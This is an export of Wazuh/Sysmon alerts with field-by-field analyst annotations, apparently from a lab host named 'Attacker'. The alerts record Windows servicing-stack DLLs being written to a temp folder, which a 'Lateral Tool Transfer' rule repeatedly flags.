data.win.eventdata.utcTime: 2025-04-20 01:55:28.170 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\UpdateCompression.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.170 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 16 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.667352 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.1824317Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260600 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.180
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\wcp.dll
CreationUtcTime: 2025-04-20 01:55:28.180
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.180 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\wcp.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.180 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 17 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.670301 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.2039426Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260601 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.202
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\wdscore.dll
CreationUtcTime: 2025-04-20 01:55:28.202
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.202 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\wdscore.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.202 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 18 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.673266 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.2071612Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260602 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.205
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\wimgapi.dll
CreationUtcTime: 2025-04-20 01:55:28.205
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.205 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\wimgapi.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.205 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 19 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.676231 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.2133548Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260603 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.212
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\wrpint.dll
CreationUtcTime: 2025-04-20 01:55:28.212
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.212 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\wrpint.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.212 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 20 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.679192 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.2182589Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260605 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.217
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-base-util-l1-1-0.dll
CreationUtcTime: 2025-04-20 01:55:28.217
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.217 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-base-util-l1-1-0.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.217 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 21 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.682282 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.2214364Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260606 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.219
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-com-l1-1-0.dll
CreationUtcTime: 2025-04-20 01:55:28.219
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.219 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-com-l1-1-0.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.219 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 22 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.685368 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.2240171Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260607 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
